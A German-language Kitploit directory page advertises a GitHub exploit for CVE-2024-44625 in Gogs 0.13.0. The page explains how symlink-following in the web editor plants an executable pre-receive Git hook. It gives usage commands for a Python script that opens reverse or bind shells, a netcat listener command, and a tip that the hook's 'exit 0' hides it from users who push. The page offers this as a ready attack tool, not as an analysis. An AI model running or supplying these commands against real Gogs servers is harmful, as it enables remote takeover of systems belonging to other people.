Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-44625-Gogs-RCE-0.13.0 — Exploit für CVE-2024-44625 in Gogs 0.13.0, der Remote-Codeausführung über Symlink-Following zur Erstellung eines Git-Hooks erreicht, mit Reverse- und Bind-Shell-Modi. | Kitploit
Tools/GitHubGitHub/batj44/cve-2024-44625-gogs-rce-0.13.0
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubbatj44/cve-2024-44625-gogs-rce-0.13.0

CVE-2024-44625-Gogs-RCE-0.13.0

Exploit für CVE-2024-44625 in Gogs 0.13.0, der Remote-Codeausführung über Symlink-Following zur Erstellung eines Git-Hooks erreicht, mit Reverse- und Bind-Shell-Modi.

Repository anzeigen
vor 1 TagNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-44625 & Gogs-RCE-0.13.0

Validiert gegen eine Gogs-Version aus der 0.13.0-Ära hinter einem Reverse-Proxy. Primitive: Symlink-Follow im Web-Editor zu einer NICHT VORHANDENEN .git/hooks/pre-receive erstellt diese Datei (ausführbar). Jeder anschließende Push auf das Repository führt sie aus.

Verwendung:

Reverse-Shell (zuerst Listener starten: nc -lvnp 4444)

root@kitploit:~
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
    --mode reverse --lhost <YOUR_IP> --lport 4444

Bind-Shell (dann verbinden: nc )

root@kitploit:~
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
    --mode bind --bind-port 5555

Vorhandenen Hook erneut auslösen (Repository bereits vergiftet) ohne erneutes Platzieren:

root@kitploit:~
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
    --mode reverse --lhost IP --lport 4444 --repo <name> --reuse --triggers 3

Hinweise:

  • Das Repository ist ein NEUES Wegwerf-Repository, das unter --owner erstellt wird (Standard: --user).
  • Der Hook-Pfad wird aus --root abgeleitet (Standard: /data/git/gogs-repositories, Docker).
  • exit 0 lässt Pushes normal aussehen (kein "hook declined"-Fehler).
Tool herunterladen